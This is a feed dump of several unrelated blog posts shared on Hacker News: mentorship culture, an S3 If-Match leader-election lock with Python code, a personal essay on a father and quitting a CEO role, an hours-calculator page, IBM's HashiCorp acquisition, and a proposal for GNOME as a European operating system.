    While mentorship clearly benefits individual growth and development, its strategic value to the organization is equally impactful. When woven into company culture, mentorship creates multiple layers of organizational advantage that compound over time.

    Informal Networks and Knowledge Flow

    Every opportunity that is seized to have a mentoring conversation is also an opportunity to make an introduction to someone else who can help to build on their knowledge or help them further. Through this, the mentorship culture creates an informal network of information flow throughout the organization. When mentorship is baked into the culture, knowledge spreads more organically rather than staying siloed. Because information is actively and regularly shared through this informal network, there is redundancy to who knows what, which leads to problems being solved faster.

    Innovation and Problem-Solving

    This natural knowledge flow brings more perspectives into the problem-solving process. It's not just about different seniority levels — it's about cross-functional and cross-departmental learning that leads to more innovative solutions. When people from different parts of the organization regularly share knowledge and perspectives, they develop a broader understanding of the business and can spot opportunities that might otherwise go unnoticed. While this improved problem-solving capability delivers immediate value, the long-term strategic benefits are even more important.

    Leadership Development and Succession

    Perhaps most strategically valuable, a mentorship culture becomes a fundamental part of leadership redundancy and succession planning. Intentional mentorship creates multiple layers of capable leaders, even improving the discoverability of those who may not be in the obvious organizational hierarchy. And because knowledge is more distributed, the organization becomes less dependent on any single person. This creates a more resilient organization that is more adaptive to change, better at spotting threats and opportunities, quicker to respond to challenges, and more capable of sustaining performance through transitions.

    Strength Through Culture

    At its core, a mentorship culture creates something more sustainable and powerful than any standalone program could achieve: it builds trust and psychological safety throughout the organization by strengthening relationships by design. When knowledge sharing and the investment in each others' growth becomes part of how work gets done, it transforms how people interact. Team members become more willing to ask questions, share concerns, and offer new perspectives. This psychological safety, in turn, accelerates learning, growth, and innovation across the organization.

    The true power of a mentorship culture lies in how it compounds over time. Each meaningful exchange strengthens bonds. Each connection builds bridges across the organization. These bridges create new pathways for knowledge to flow, ideas to spread, and leaders to emerge. The result isn't just a more capable organization — it's a more adaptable and resilient one.

    This is why mentorship needs to be recognized as a fundamental building block of organizational health. At the rate in which technology is advancing and challenges are increasingly complex, our ability to learn from each other isn't just a "nice to have" — it's essential for business survival. The question isn't whether to invest in mentorship programs, but rather how to rethink mentorship from a separate initiative into a fundamental part of how we work. When we succeed at this, mentorship stops being something we do on top of our day jobs – it becomes how our organizations function and grow.

    ]]>
    https://www.nathanbroslawsky.com/p/how-to-build-a-mentorship-culture-not-just-another-program/ hacker-news-small-sites-43205502 Fri, 28 Feb 2025 13:46:08 GMT
    <![CDATA[Leader Election with S3 and If-Match]]> thread link) | @todsacerdoti
    February 28, 2025 | https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html | archive.org

    Let’s implement leader election using Amazon S3’s If-Match condition by building a distributed lock with it.

    In August 2024, Gunnar Morling published a blog post that shows how to do it with the If-None-Match condition. Back then, If-Match had not yet been released. This post shows another way to solve the same problem.

    The post is intended to stand on its own so you don’t need to read Gunnar’s post first. But do read it as well to see how the solutions compare!

    What’s If-Match

    PutObject is the API call that you use to upload data to Amazon S3. By default, the PutObject calls are upserts: they will replace the object contents or create an object if one does not already exist.

    In 2024, Amazon introduced two conditions for the PutObject calls: If-Match (announcement) and If-None-Match (announcement). They allow you to restrict the behavior in the following ways:

    • If you set If-None-Match: *, the call will only succeed if the object does not already exist.
    • If you set If-Match: <value>, the call will only succeed if the object exists and its content has the matching entity tag (ETag) value. An entity tag is essentially a checksum for the object content.

    DeleteObject also takes the If-Match condition, so you can delete an object only if it has a matching ETag.

    If the call fails, you’ll get a 412 error response (or, in some cases, another 4xx error).

    Together with S3’s consistency guarantees these conditions allow you to do compare-and-swap (CAS) operations. They are a key building block for distributed systems.

    What’s leader election?

    Many distributed systems require designating one of the nodes as the leader. Typically the leader accepts the write requests from the clients and then sends them to the other nodes that process read requests.

    How do the nodes choose the leader? Martin Kleppmann in Designing Data-Intensive Applications writes:

    One way of electing a leader is to use a lock: every node that starts up tries to acquire the lock, and the one that succeeds becomes the leader.

    If we can build a distributed lock, we can perform leader election. Let’s see how to do that on S3.

    The locking protocol

    We will use a single object in the bucket for locking. Let’s call it lock. It will be a JSON blob that looks like this:

    {
      "expires_at": 1740151473.206179
    }
    

    Here expires_at is a timestamp in seconds since the UNIX epoch for when the lock expires.

    To acquire the lock, the nodes do the following.

    1. Read the contents of lock. If the object does not exist, there’s no lock and we can jump to step 3.
    2. If expires_at is in the past, the lock has expired and we can continue. Otherwise acquiring the lock has failed.
    3. Put a new version of lock with the desired expiration time and with one of the conditions:
      • If lock existed in step 1, use If-Match with its ETag value.
      • If lock did not exist in step 1, use If-None-Match.

    If the put in step 3 succeeds, the node has acquired the lock.

    S3 has strong read-after-write consistency, so if there is a lock, in step 1 every node is guaranteed to see up-to-date version of the lock data. In step 3, the use of the conditions guarantees that only one node will succeed at acquiring the lock.

    If the leader wants to release the lock, it can delete the object using If-Match with the ETag value received in step 3.

    Fencing tokens

    The elephant in the room is that this relies on the nodes having their clocks in sync, which is a famously difficult problem. Consider what happens if the leader’s clock is behind the others or the clock of one of the secondaries is ahead of the others: the leader thinks it still holds the lock while the secondary thinks it has expired. If the secondary now grabs the lock, the former leader can end up issuing zombie requests.

    In his post How to do Distributed Locking, Martin Kleppmann explains that you can use fencing tokens to solve the issue. A fencing token is a number that increases every time a node acquires the lock. The token should then be included in the requests to the system that we hold the lock over, and that system should track the highest token it has seen and reject requests with lower tokens. This filters out the zombie requests.

    In our case, even expires_at could work as a fencing token if the lock duration is always the same. The protocol guarantees that it will always increase.

    However, we do not have to make the lock duration fixed. We can add another field token to the JSON object:

    {
      "expires_at": 1740151473.206179,
      "token": 1
    }
    

    token is a number, starting at zero, that should be incremented every time the lock is acquired. The node acquiring the lock reads it in step 1 and it can increase it in step 3.

    Releasing the lock by deleting object does not work anymore as that would reset the token. You can release the lock by setting expires_at to zero without incrementing token.

    {
        "expires_at": 0,
        "token": 1
    }
    

    Python implementation

    Here’s a basic implementation in Python using boto3. Adding support for the fencing tokens and releasing the lock is left as an exercise for the reader.

    import dataclasses
    import json
    from dataclasses import dataclass
    from datetime import UTC, datetime, timedelta
    from typing import TYPE_CHECKING, Self
    
    import boto3
    import botocore.exceptions
    
    if TYPE_CHECKING:
        from mypy_boto3_s3.client import S3Client
    
    s3_client: "S3Client" = boto3.client("s3")
    
    
    @dataclass(frozen=True)
    class LockData:
        expires_at: float
    
        def to_json(self) -> str:
            return json.dumps(dataclasses.asdict(self))
    
        @classmethod
        def from_json(cls, data: str) -> Self:
            return cls(**json.loads(data))
    
    
    def acquire_lock(
        s3_client: "S3Client",
        bucket: str,
        key: str = "lock",
        expires_in: timedelta = timedelta(seconds=60),
    ) -> bool:
        """Try to acquire a lock using S3 as the coördination mechanism.
    
        Args:
            s3_client: boto3 S3 client
            bucket: S3 bucket name
            key: S3 object key
            expires_in: Lock timeout
    
        Returns:
            bool: True if the lock was acquired, False otherwise
        """
    
        try:
            existing_lock = s3_client.get_object(
                Bucket=bucket,
                Key=key,
            )
        except botocore.exceptions.ClientError as e:
            if e.response["Error"]["Code"] == "NoSuchKey":
                existing_lock = None
            else:
                raise
    
        if existing_lock is not None:
            existing_data = LockData.from_json(existing_lock["Body"].read().decode("utf-8"))
    
            if datetime.now(UTC).timestamp() <= existing_data.expires_at:
                return False
    
            condition = {"IfMatch": existing_lock["ETag"]}
        else:
            condition = {"IfNoneMatch": "*"}
    
        lock_data = LockData(expires_at=(datetime.now(UTC) + expires_in).timestamp())
    
        try:
            s3_client.put_object(
                Bucket=bucket,
                Key=key,
                Body=lock_data.to_json(),
                **condition,  # type: ignore[arg-type]
            )
        except botocore.exceptions.ClientError as error:
            if error.response["Error"]["Code"] in (
                "ConditionalRequestConflict",
                "PreconditionFailed",
            ):
                # We could alternatively retry on ConditionalRequestConflict (409)
                return False
            raise
    
        return True
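
    For completeness, calling it might look like this (the bucket name is invented):

    if acquire_lock(s3_client, bucket="my-coordination-bucket"):
        print("became leader until the lock expires")
    else:
        print("someone else holds the lock; try again later")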
    

    Here’s another exercise for the reader: The lock object does not include information about who is holding the lock as it’s not necessary for the protocol. However, it would be handy in a real-world implementation in case you ever need to debug this.

    Does this make sense?

    What’s nice about this compared to Gunnar’s version is that there’s no need for a background process to delete the stale lock objects. Gunnar’s design creates a new object every time a lock is acquired but in this version, there’s only a single object that gets modified.

    However, with both designs you have to ask whether they make sense in the real world. As I’ve mentioned before, while S3 storage is fairly inexpensive, the requests are not cheap: in the standard tier and us-east-1 region, PUTs cost $0.005 per 1000 requests and GETs cost $0.0004 per 1000 requests. The latencies are in double-digit milliseconds. S3 Express One Zone makes the requests only 2x cheaper, so it does not materially change the situation.

    This means that if you’re looking to build a high-performance, low-cost distributed lock, S3 is not going to be your first choice. You would probably use it because you’re already using S3 for something else and you want to hold a lock over S3 resources. Unfortunately S3 does not support fencing tokens for PutObject calls, which limits the usefulness of this approach.

    This is a companion post for my lightning talk Why S3’s conditional writes made people excited at HYTRADBOI that shows how to use If-None-Match. It presents an idea similar to Gunnar’s and to what Delta Lake uses in practice.

    Talk errata: The error response for failing condition is 412, not 421 as claimed in the talk.

    Thanks to Joel Kaasinen, Juuso Takalainen, Iivari Äikäs, Waltteri, and Rishit for giving feedback on the talk and thanks to Joel Kaasinen for feedback on this post. Any mistakes are my own.

    Photos: The first one shows a rock and a tree at the frozen Lake Meiko in Kirkkonummi, Finland on a cloudy winter day. The second one is a cliff at Vepsu, a small island in the sea in front of Hamina, Finland.

    ]]>
    https://quanttype.net/posts/2025-02-25-leader-election-with-s3-and-if-match.html hacker-news-small-sites-43205434 Fri, 28 Feb 2025 13:39:16 GMT
    <![CDATA[Up and to the Right]]> thread link) | @will_critchlow
    February 28, 2025 | https://www.jordandipietro.com/article/up-and-to-the-right | archive.org

    My first job was in 6th grade - I was a busboy at Sam's Grill.

    My best friend Danny and I would bike there after school, clear plates, roll silverware, help the cooks deal dime bags behind the dumpster.

    Easy money.

    But man oh man, that first paycheck—the way those crumpled bills felt in my pocket. That dopamine hit. That excitement. Some kids get it and some kids just don't. 

    My Dad may have recognized the spark in me. Maybe he saw himself in it, who knows. 

    So he did what any good Dad would do—he took me to Beneficial Bank on Lancaster Ave, the same Philly institution where he'd been loyally depositing his own money for decades.

    Opening my first savings account didn't just give me a bank book; with it, I inherited his deeply rooted philosophy that equated saving with survival, his quiet obsession with financial security that bordered on paranoia, and the unspoken family doctrine that worth could be measured by how well you've prepared.

    That bank book became my scoreboard. 

    Every neighborhood had its hustles, and my friends and I chased them all.

    Snow shoveling, house painting, car washing, hoagie making.

    I’m not sure I worked hard because of some noble, to-be-developed-later work ethic, or if it was more of an obsessive-compulsive desire to watch my bank account climb.

    The subconscious need to see things move up-and-to-the-right.

    Looking back, I see now that while some of this was me, a lot was learned behavior. 

    My Dad quite literally shaped me—he was the family hero, the sole breadwinner, the heartbeat of our household.

    And my Pops was of course a product of his environment, and his father - growing up in poor Philadelphia, in a lower-class, work-before-play household with an immigrant-mentality. Pick yourself up by the bootstraps, etc.

    So he did—he went to college, med school, Vietnam, came home a few fractured fingers later, and opened up shop as a dentist in the blue-collar, Italian neighborhood where his parents still lived. 

    His office was pure 70's fever dream—turquoise swivel chairs, oversized lamps, dog-eared magazines stacked in every corner. My mom worked the front desk, my sister and I did homework in the back as Dad drilled and filled. 

    He was there at sunrise, left after dark—sixty, seventy hours a week of other people's molars.

    Then he'd come home, spread insurance forms across our kitchen table, and wage war against bureaucratic bullshit until midnight, muttering numbers under his breath like prayers. 

    If it sounded hard—it was. 

    But make no bones about it, he lifted us up into another stratosphere from where he came. We were solidly middle-class— by high-school, maybe even upper middle-class.

    But no doubt it all wore on him.

    He was almost always stressed, always grinding, always counting the wad of cash in his wallet. 

    Money in, money out. 

    And as a sensitive kid, I watched my Dad with cautious eyes—tracking his long hours, his countless steps. 

    I had this childhood fantasy of growing up to make 'millions', just so he could slow down, finally take a breath...so his shoulders might drop an inch from his ears. 

    And then years passed.

    I went to college, started my career, went to grad school, started again.

    The possibility of making good money - the fantasy of helping my Dad ease into retirement was starting to feel possible, almost within reach.

    Then life did what it does: a brain aneurysm took him at 65, just a few years shy of the retirement he'd been counting down to his whole life.

    No warning, no goodbye, no chance to rest.

    In my grief, I doubled down on the only strategy I knew: make money, save money, rinse, repeat. 

    As if somehow, by accumulating enough, I could retroactively win a game that had already ended.

    So I tried. 

    I worked hard. I was often in the right place at the right time. I stashed each bonus, each salary increase, each lucky break.

    The numbers were tracked like an excel-sheet religion: invest everything, max the 401ks, watch the dollars march up-and-to-the-right. Always up, always right -the sacred direction of success.

    Go go go.

    The decades blurred. Each milestone triggered a new hunger—what felt like 'enough' at 25 was a joke at 30. What seemed impossible at 35 was inevitable by 40.

    The faster I ran, the faster I could run.

    Never did I really stop to question the obsession, the burning need to accumulate. The voice in my head just constantly whispering 'more.'

    Until last year, I came up a bit for air. 

    By any normal relative measure, I'd 'made it'—I climbed from a 20-something worker bee to the C-suite at a billion dollar company, landed my dream gig as CEO, first at The Hustle and later at Hampton, building teams and a track record I was actually really proud of. 

    And Hampton was the dream—we had immediate distribution, solid backing, a chance to build the kind of community I knew founders craved.

    I was surrounded by smart and ambitious people, & watching our numbers explode: zero to nearly $10M, a hundred members to a thousand, all in two years flat.

    The kind of rocket ship every CEO dreams of.

    On paper, this was it—the crown jewel, the peak, the final job I'd ride into the sunset.

    But success has a funny way of showing you what you're willing to sacrifice for it.

    The all-or-nothing personality that made me good at my job was starting to steal from everywhere else. 

    To me, it was obvious: there were no more dog walks with the wife, no coaching my son's flag football team, and long gone were bedtime stories and my presence on the weekends.

    Even my texts had a ruthless priority system: work first, everything else, whenever. 

    Each small surrender added up to a larger absence.

    The irony was clear: I was a good CEO on my way to being great, and I was a great father on my way to being good.

    Two arrows moving in opposite directions.

    But walking away from Hampton felt insane - this was the dream CEO job, as good as it gets.

    This was literally the kind of opportunity my Dad—who worked six days a week his entire life—would have killed for.

    Leaving something so good felt like betraying his legacy, turning my back on generations of pushing forward at all costs.

    It felt like a fuck you to all the grinding, all the hustling that had come before me.

    But as I sat with it longer, a different truth emerged...

    My Dad was quite literally counting down the days until his retirement.

    Not because he didn't love hard work, but because he loved being a father more.

    If he'd had my chances, my opportunities, he would've closed his practice in a heartbeat. He would have grabbed his recently-discounted YMCA card, his bedside table full of DIY health books, and he’d never look back.

    And here I was, staring at my beautiful life—amazing kids still young enough to want me around, a healthy wife, an aging mom who won't be here forever—and suddenly it felt crazy not to walk away.

    The real dishonor would be missing the lesson my Dad's death taught me: truly, there is no promise of tomorrow.

    That if given the opportunity to chill out a bit, to coach my son's team, to walk my daughter to the bus, to be more calm, more present, more proactive with the people I adore most in my life... if given that opportunity, you better fucking take it.

    That each day is a gift.

    And that I don't need another up-and-to-the-right chart, I just need time.

    ]]>
    https://www.jordandipietro.com/article/up-and-to-the-right hacker-news-small-sites-43205307 Fri, 28 Feb 2025 13:25:00 GMT
    <![CDATA[Online Hours Calculator – Add Up Time Easily]]> thread link) | @lyqtzs
    February 28, 2025 | https://calculadora-de-horas.net/es | archive.org

    Free tool for calculating the total time of your daily activities, including hours worked and overtime

    How do I use the time calculator?

    Enter the hours and minutes in the corresponding fields.

    The calculator will automatically add up the times you enter.

    Use the “Add time” button for more entries.

    The total result updates instantly.

    Main Features

    • Automatic calculation of hours and minutes.
    • Multiple time entries to fit different shifts and tasks.
    • Easy-to-use interface for quick data entry.
    • Ideal for tracking work hours and overtime.
    • Adds up time precisely for efficient management of work and breaks.
    • Option to display the result in hours, minutes, or a combined total.

    The time calculator offers a quick, practical way to add up your time, whether for work or personal activities. With it, you can calculate hours worked and overtime precisely, optimizing how you manage your time.

    Related Tools

    Frequently Asked Questions about the Hours Calculator

    What Is an Hours Calculator?

    The Hours Calculator is an indispensable tool for anyone who wants to track and calculate the time spent on daily activities, especially at work. It makes it simple to calculate the total hours worked, including overtime, ensuring greater accuracy in tracking your workday.

    How Does the Calculator Work?

    Our Hours Calculator was designed to make calculating work time easier and more accurate. Just enter the start and end hours and minutes of each activity or shift, and the program automatically does all the work for you. No more manual calculations! The tool computes time quickly, precisely, and without errors, making the process convenient and hassle-free.

    Benefits of Using the Calculator

    • Workday Tracking: Monitoring your work time is essential to ensure you do not exceed your daily or weekly limits.
    • Overtime Calculation: If you work beyond your regular schedule, the Hours Calculator helps you calculate the total overtime accurately.
    • Organization and Planning: Keeping track of hours worked can help you plan your routine better, balancing your professional and personal life.

    Why Use Our Hours Calculation Tool?

    Besides being completely free, our Hours Calculator was designed to be simple and intuitive. You do not need to be a math expert to use it, since it performs all the calculations automatically. Whether you are self-employed, a freelancer, or an employee, our tool can be a great ally in managing your time.

    How Do I Access the Hours Calculator?

    To use our calculator, just go directly to https://calculadora-de-horas.net . It is quick and easy! If you find it useful, do not forget to share it with friends and colleagues so they can also benefit from this handy tool.

    ]]>
    https://calculadora-de-horas.net/es hacker-news-small-sites-43205156 Fri, 28 Feb 2025 13:04:39 GMT
    <![CDATA[HashiCorp Lost Its Way]]> thread link) | @sausagefeet
    February 28, 2025 | https://terrateam.io/blog/hashicorp-lost-its-way/ | archive.org

    IBM acquires HashiCorp. End of an era?

    Yesterday, February 27, 2025, it was announced that IBM had finished acquiring HashiCorp. HashiCorp is now an IBM company. In many ways, it feels like the end of an era.

    To me, HashiCorp felt like the dream. Not working there, but building the company. A smart and innovative software developer builds a successful developer tools company, hits a double digit billion dollar valuation at one point, and retires to learn to fly airplanes.

    The vibe on Hacker News does not feel like a celebration. Being swallowed by IBM is not the victory people would have predicted when HashiCorp IPO’d.

    In the developer world, IBM does not come to mind when we think of tools we love. Despite IBM’s work in open source, it feels like a company built for executives by executives.

    IBM has done a great job of maintaining its value over the years. It may not be as exciting as a FAANG stock, but as of this writing, it still has a market cap of a quarter trillion dollars. How will having access to all those resources impact HashiCorp?

    HashiCorp lost its way

The truth is, while I respect all of the work HashiCorp has done (Terrateam would not exist as it does right now without HashiCorp), I think most people feel HashiCorp lost its way a while ago.

    Switching to Resources Under Management (RUM) pricing felt like the first attempt to squeeze money out of customers without giving them a better experience.

    Then, rather than competing on innovation, HashiCorp gave up on its open source roots, the thing that made it the dominant player it became, and switched its products to the source-available BUSL license. That opened a lot of people’s eyes to the new reality. HashiCorp was trying to win by shutting down competition instead of building something better.

    Open source stepped in

    A lot of us competing with HashiCorp got together and forked Terraform, creating OpenTofu, a drop-in replacement. OpenTofu has been adding features while keeping compatibility with Terraform. It is part of the Linux Foundation, making it a true community-driven open source tool.

    Terraform is not the only HashiCorp tool that got forked. OpenBao was forked from Vault.

    Will HashiCorp start innovating again?

    Now that it is part of IBM, will HashiCorp start innovating again? I am skeptical. That is just not what IBM is known for, and HashiCorp did not have a culture of innovation at the time of the acquisition.

    What this means for Terrateam

    At Terrateam, we find the acquisition interesting from a historical perspective, but it never really felt like it impacted us. Our product has always taken a different approach to managing infrastructure than HashiCorp.

    If you love the Terrateam product, then you probably would not be a devout Terraform Cloud user anyway. It would take a huge pivot to compete with the workflow Terrateam gives users.

    Terrateam has always been dedicated to fair, transparent, and honest pricing. Combined with recently going open source, we are just on a different path than either HashiCorp alone or HashiCorp under IBM.

I think that in its attempt to capture more value, HashiCorp has given up its position as a leader in developer tooling. Yes, its tools will be used for years to come, but the next big tool won’t come from them, and the next great features in the Terraform and Vault space won’t come from them either. The king is dead, long live the king’s legacy.

    ]]>
    https://terrateam.io/blog/hashicorp-lost-its-way/ hacker-news-small-sites-43204794 Fri, 28 Feb 2025 12:18:54 GMT
    <![CDATA[Prosthetics That Don't Betray]]> thread link) | @thibaultamartin
    February 28, 2025 | https://ergaster.org/posts/2025/02/28-prosthetics-that-dont-betray/ | archive.org

Tech takes a central place in our lives. Banking and administrative tasks are happening more and more online. It’s becoming increasingly difficult to get through life without a computer or a smartphone. They have become external organs necessary to live our lives.

    Steve Jobs called the computer the bicycle for the mind. I believe computers & smartphones have become prosthetics, extensions of people that should unconditionally and entirely belong to them. We must produce devices and products the general public can trust.

Microsoft, Google and Apple are three American companies that build the operating systems our computers, phones, and servers run on. This American hegemony over ubiquitous devices is dangerous for all citizens worldwide, especially under an unpredictable, authoritarian American administration.

    Producing devices and an operating system for them is a gigantic task. Fortunately, it is not necessary to start from zero. In this post I share what I think is the best foundation for a respectful operating system and how to get it into European, and maybe American, hands. In a follow-up post I will talk more about distribution channels for older devices.

    The rest of the world matters

    In this post I take a European-centric view. The rest of the world matters, but I am not familiar with what their needs are nor how to address them.

    We’re building prosthetics

Prosthetics are extensions of ourselves as individuals. They are deeply personal. We must ensure our devices & products are:

    • Transparent about what they do. They must not betray people and do things behind their backs. Our limbs do what we tell them. When they don’t, it’s considered a problem and we go to a physician to fix it.
    • Intuitive, documented, accessible and stable. People shouldn’t have to re-learn how to do things they were used to doing. When they don’t know how to do something, it must be easy for them to look it up or find someone to explain it to them. The devices must also be accessible and inclusive to reduce inequalities, instead of reinforcing them. Those requirements are a social matter, not a technical one.
    • Reliable, affordable, and repairable. Computers & smartphones must not allow discrimination based on social status and wealth. Everyone must have access to devices they can count on, and be able to maintain them in a good condition. This is also a social problem and not a technical one. It is worth noting that “the apps I need must be available for my system” is an often overlooked aspect of reliability, and “I don’t have to install the system because it’s bundled with my machine” is an important aspect of affordability.

    I believe that the GNOME project is one of the best placed to answer those challenges, especially when working in coordination with the excellent postmarketOS people who work on resurrecting older devices abandoned by their manufacturers. There is real stagnation in the computing industry that we must see as a social opportunity.

    A screenshot of the GNOME desktop, with the accent color set to orange. Several apps are open, and their primary UI element are colored in orange.

    Constraints are good

    GNOME is a computing environment aiming for simplicity and efficiency. Its opinionated approach benefits both users and developers:

    • From the user perspective, apps look and feel consistent and sturdy, and are easy to use thanks to well thought out defaults.
    • From the developer perspective, the opinionated human interface guidelines let them develop simpler, more predictable apps with less edge cases to test for.

GNOME is a solid foundation to build respectful tech. It doesn’t betray people by doing things behind their back. It aims for simplicity and stability, although it could use more user research to back design decisions if funding allowed, as was successfully the case for GNOME 40.

    Mobile matters

    GNOME’s Human Interface Guidelines and development tooling make it easy to run GNOME apps on mobile devices. Some volunteers are also working on making GNOME Shell (the “desktop” view) render well on mobile devices.

    A screenshot of GNOME on a mobile phone. It has three apps open on the top third, and an app grid taken the bottom two thirds.

postmarketOS already offers it as one of the UIs you can install on your phone. With mobile taking over traditional computer usage, it is critical to consider the mobile side of computing too.

    Hackability and safety

    As an open source project, GNOME remains customizable by advanced users who know they are bringing unsupported changes, can break their system in the process, and deal with it. It doesn’t make customization easy for those advanced users, because it doesn’t optimize for them.

The project also has its fair share of criticism, some valid, and some not. I agree that sometimes the project can be too opinionated and rigid, optimizing for extreme consistency at the expense of user experience. For example, while I agree that system trays are suboptimal, they’re also a pattern people have been used to for decades, and removing them is very frustrating for many.

    But some criticism is also coming from people who want to tinker with their system and spend countless hours building a system that’s the exact fit for their needs. Those are valid use cases, but GNOME is not built to serve them. GNOME aims to be easy to use for the general public, which includes people who are not tech-experts and don’t want to be.

    We’re actually building prototypes

    As mighty as the GNOME volunteers might be, there is still a long way before the general public can realistically use it. GNOME needs to become a fully fledged product shipped on mainstream devices, rather than an alternative system people install. It also needs to involve representatives of the people it intends to serve.

    You just need to simply be tech-savvy

GNOME is not (yet) an end user product. It is a desktop environment that needs to be shipped as part of a Linux distribution. There are many distributions to choose from. They do not all ship the same version of GNOME, and some patch it more or less heavily. This kind of fragmentation is one of the main factors holding the Linux desktop back.

A screenshot of the gnome.org website about how to get GNOME.

The general public doesn’t want to have to pick a distribution and bump into every edge case that creates. They need a system that works predictably, that lets them install the apps they need, and that gives them safe ways to customize it as a user.

    That means they need a system that doesn’t let them shoot themselves in the foot in the name of customizability, and that prevents them from doing some things unless they sign with their blood that they know it could make it unusable. I share Adrian Vovk’s vision for A Desktop for All and I think it’s the best way to productize GNOME and make it usable by the general public.

    People don’t want to have to install an “alternative” system. They want to buy a computer or a smartphone and use it. For GNOME to become ubiquitous, it needs to be shipped on devices people can buy.

For GNOME to really take off, it needs to become a system people can use both in their personal life and at work. It must become a compelling product in enterprise deployments: to route enough money towards development and maintenance, to make it an attractive platform for vendors to build software for, and to make it an attractive platform for device manufacturers to ship.

    What about the non tech-savvy?

GNOME aims to build a computing platform everyone can trust. But it doesn’t have a clear, scalable governance model with representatives of those it serves. GNOME has rudimentary governance to define what is part of the project and what is not thanks to its Release Team, but it is largely a do-ocracy, as highlighted in the Governance page of GNOME’s Handbook as well as in GNOME Designer Tobias Bernard’s series Community Power.

    A do-ocracy is a very efficient way to onboard volunteers and empower people who can give away their free time to get things done fast. It is however not a great way to get work done on areas that matter to a minority who can’t afford to give away free time or pay someone to work on it.

    The GNOME Foundation is indeed not GNOME’s vendor today, and it doesn’t contribute the bulk of the design and code of the project. It maintains the infrastructure (technical and organizational) the project builds on. A critical, yet little visible task.

    A screenshot of the GNOME Developers website where people can learn to build, design, or distribute for GNOME

    To be a meaningful, fair, inclusive project for more than engineers with spare time and spare computers, the project needs to improve in two areas:

    1. It needs a Product Committee to set a clear product direction so GNOME can meaningfully address the problems of its intended audience. The product needs a clear purpose, a clear audience, and a robust governance to enforce decisions. It needs a committee with representatives of the people it intends to serve, designers, and solution architects. Of course it also critically needs a healthy set of public and private organizations funding it.
    2. It needs a Development Team to implement the direction the committee has set. This means doing user research and design, technical design, implementing the software, doing advocacy work to promote the project to policymakers, manufacturers, private organizations’ IT department and much more.

    Bikeshedding is a real risk

    A Product Committee can be a useful structure for people to express their needs, draft a high-level and realistic solution with designers and solution architects, and test it. Designers and technical architects must remain in charge of designing and implementing the solution.

    The GNOME Foundation appears as a natural host for these organs, especially since it’s already taking care of the assets of the project like its infrastructure and trademark. A separate organization could more easily pull the project in a direction that serves its own interests.

    Additionally, the GNOME Foundation taking on this kind of work doesn’t conflict with the present do-ocracy, since volunteers and organizations could still work on what matters to them. But it would remain a major shift in the project’s organization and would likely upset some volunteers who would feel that they have less control over the project.

    I believe this is a necessary step to make the public and private sector invest in the project, generate stable employment for people working on it, and ultimately make GNOME have a systemic, positive impact on society.

    GNOME needs solution architects

The GNOME community has designers with a good product vision. It is also full of experts on their own modules, but it has a shortage of people with a good technical overview of the project, who can turn product issues into technical ones at the scale of the whole project.

    So what now?

    “The year of the Linux desktop” has become a meme now for a reason. The Linux community, if such a nebulous thing exists, is very good at solving technical problems. But building a project bigger than ourselves and putting it in the hands of the millions of people who need it is not just a technical problem.

    Here are some critical next steps for the GNOME Community and Foundation to reclaim personal computing from the trifecta of tech behemoths, and fulfill an increasingly important need for democracies.

    Learn from experience

    Last year, a team of volunteers led by Sonny Piers and Tobias Bernard wrote a grant bid for the Sovereign Tech Fund, and got granted €1M. There are some major takeaways from this adventure.

    At risk of stating the obvious, money does solve problems! The team tackled significant technical issues not just for GNOME but for the free desktop in general. I urge organizations and governments that take their digital independence seriously to contribute meaningfully to the project.

    Finally and unsurprisingly, one-offs are not sustainable. The Foundation needs to build sustainable revenue streams from a diverse portfolio to grow its team. A €1M grant is extremely generous from a single organization. It was a massive effort from the Sovereign Tech Agency, and a significant part of their 2024 budget. But it is also far from enough to sustain a project like GNOME if every volunteer was paid, let alone paid a fair wage.

    Tread carefully, change democratically

    Governance and funding are a chicken and egg problem. Funders won’t send money to the project if they are not confident that the project will use it wisely, and if they can’t weigh in on the project’s direction. Without money to support the effort, only volunteers can set up the technical governance processes on their spare time.

Governance changes must be done carefully though. Breaking the status quo without a plan comes with significant risks. It can demotivate current volunteers, make the project lose traction with newcomers, and let it die before enough funding makes it to the project to sustain it. A lot of people have invested significant amounts of time and effort into GNOME, and this must be treated with respect.

    Build a focused MVP

For the STF project, the GNOME Foundation relied on contractors and consultancies. To be fully operational and efficient, it must get into a position to hire people with the most critical skills. I believe the most critical profile right now is the solution architect. With more revenue, developers and designers can join the team as it grows.

    But for that to happen, the Foundation needs to:

    1. Define who GNOME is for in priority, bearing in mind that “everyone” doesn’t exist.
    2. Build a team of representatives of that audience, and a product roadmap: what problems do these people have that GNOME could solve, how could GNOME solve it for them, how could people get to using GNOME, and what tradeoffs would they have to make when using GNOME.
    3. Build the technical roadmap (the steps to make it happen).
    4. Fundraise to implement the roadmap, factoring in the roadmap creation costs.
5. Implement and test.

The Foundation can then build on this success and start engaging with policymakers, manufacturers, and vendors to extend its reach.

    Alternative proposals

The model proposed has a significant benefit: it gives clarity. You can give money to the GNOME Foundation to contribute to the maintenance and evolution of the GNOME project, instead of only supporting its infrastructure costs. It unlocks the possibility to fund user research that would also benefit all the downstreams.

    It is possible to take the counter-point and argue that GNOME doesn’t have to be an end-user product, but should remain an upstream that several organizations use for their own product and contribute to.

The “upstream only” model is the status quo, and the main advantage of this model is that it lets contributing organizations focus on what they need the most. The GNOME Foundation would need to scale down to a minimum to only support the shared assets and infrastructure of the project and minimize its expenses. Another (public?) organization would need to tackle the problem of making GNOME a well-integrated end-user product.

    In the “upstream only” model, there are two choices:

    • Either the governance of GNOME itself remains the same, a do-ocracy where whoever has the skills, knowledge and financial power to do so can influence the project.
    • Or the Community can introduce a more formal governance model to define what is part of GNOME and what is not, like Python PEPs and Rust’s RFCs.

    It’s an investment

Building an operating system usable by the masses is a significant effort and requires a lot of expertise. It is tempting to think that since Microsoft, Google and Apple are already shipping several operating systems each, we don’t need one more.

    However, let’s remember that these are all American companies, building proprietary ecosystems that they have complete control over. In these uncertain times, Europe must not treat the USA as a direct enemy, but the current administration makes it clear that it would be reckless to continue treating it as an ally.

    Building an international, transparent operating system that provides an open platform for people to use and for which developers can distribute apps will help secure EU’s digital sovereignty and security, at a cost that wouldn’t even make a dent in the budget. It’s time for policymakers to take their responsibilities and not let America control the digital public space.

    ]]>
    https://ergaster.org/posts/2025/02/28-prosthetics-that-dont-betray/ hacker-news-small-sites-43204755 Fri, 28 Feb 2025 12:13:33 GMT
    <![CDATA[Netboot Windows 11 with iSCSI and iPXE]]> thread link) | @terinjokes
